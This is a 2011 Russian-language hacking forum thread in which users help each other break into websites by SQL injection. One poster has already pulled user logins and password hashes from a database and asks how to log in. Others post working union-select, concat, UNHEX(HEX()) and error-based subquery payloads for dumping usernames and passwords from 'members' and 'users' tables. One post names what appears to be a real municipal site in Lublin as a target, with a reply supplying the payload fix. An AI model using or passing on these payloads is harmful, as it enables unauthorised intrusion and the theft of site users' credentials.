03.11.2011, 15:08
|
|
Новичок
Регистрация: 21.07.2011
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
Всем Привет.Вытянул из базы логины и пароли юзеров,патюсь залогинится выдет такую ошибку
Сообщение от None
Fatal error: Uncaught exception 'Exception' with message '_doQuery: [Error message: Could not execute statement] [Last executed query: SELECT logged_in FROM users WHERE username = 'j' AND password = '5eb59a1c45ec8d0eafe705c45aa15ce1'] [Native code: 1054] [Native message: Unknown column 'logged_in' in 'field list'] ' in /home/marketing/emaxxtech.com/includes/functions.php:6 Stack trace: #0 /home/marketing/emaxxtech.com/login.php(14): error_handler(Object(MDB2_Error)) #1 {main} thrown in /home/marketing/emaxxtech.com/includes/functions.php on line 6
что это значит и можно ли как-то использовать?
p.s. только учусь по данной теме ,поэтому не судим строго,очень прошу.. |
|
|
03.11.2011, 15:13
|
|
Новичок
Регистрация: 28.09.2011
Сообщений: 15
Провел на форуме:
2918
Репутация:
0
|
|
Сообщение от Boolean
Попробуй указать базу данных этой таблицы.
аналогичная ситуация...
|
|
|
|
03.11.2011, 15:17
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от s000r
аналогичная ситуация...
Показывай ссылку, или в пм.
upd: все, решили, проблема была как я и сказал, в указателе на базу данных с этой таблицей.
|
|
|
|
03.11.2011, 20:10
|
|
Новичок
Регистрация: 24.10.2011
Сообщений: 9
Провел на форуме:
3346
Репутация:
0
|
|
Люди помогите с sql
Имеется SQL инъекция.
www.xxx.xx/title.php?id=-32+union+select+1
версия: 5.1.49
нашел таблицу members
в таблице есть колонки: username, password
пишу запрос:
www.xxx.xx/title.php?id=-32+union+select+username from members limit 0,1 ---- не выводится ничего и при limit 1,1 и 1,2
но при:
www.xxx.xx/title.php?id=-32+union+select+password from members limit 0,1 ---все пароли выводятся
В чем может быть проблема?
|
|
|
|
03.11.2011, 20:39
|
|
Познающий
Регистрация: 03.11.2011
Сообщений: 83
Провел на форуме:
28093
Репутация:
11
|
|
Einstein,
может просто нет username-ов?) Ссылку кинь в ПМ.
P.S. Попробуй UNHEX(HEX(username))
www.xxx.xx/title.php?id=-32+union+select+UNHEX(HEX(username))+from+members+ limit+0,1+--+
|
|
|
|
03.11.2011, 21:41
|
|
Новичок
Регистрация: 24.10.2011
Сообщений: 9
Провел на форуме:
3346
Репутация:
0
|
|
ай-яй.
Все получилось помогло вот что:
www.xxx.xx/title.php?id=-34+union+select+concat(username,char(58),password) ...---b все вывелось.
tabletkO спасибо, что откликнулся =)
|
|
|
|
04.11.2011, 00:59
|
|
Познающий
Регистрация: 29.01.2011
Сообщений: 38
Провел на форуме:
12399
Репутация:
-2
|
|
Сообщение от Kuteke
NetDevilz SQL Scanner в гугл пропиши
Это ты видать не заметил, да?
|
|
|
|
04.11.2011, 01:47
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Проблемка...
При выводе инфы из БД пишет Subquery returns more than 1 row
запрос:
?id=1+and(select+1+from(select+count(*),concat((se lect+2+from+users+limit+0,1),floor(rand(0)*2))x+fr om+users+group+by+x)a)+and+1=1
|
|
|
|
04.11.2011, 16:58
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4%20order%20by %20123
как такое крутить? почему при order by 123 нет ошибки?
|
|
|
|
04.11.2011, 17:18
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от vaddd
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4%20order%20by %20123
как такое крутить? почему при order by 123 нет ошибки?
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4%20order%20by %20123+--+
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
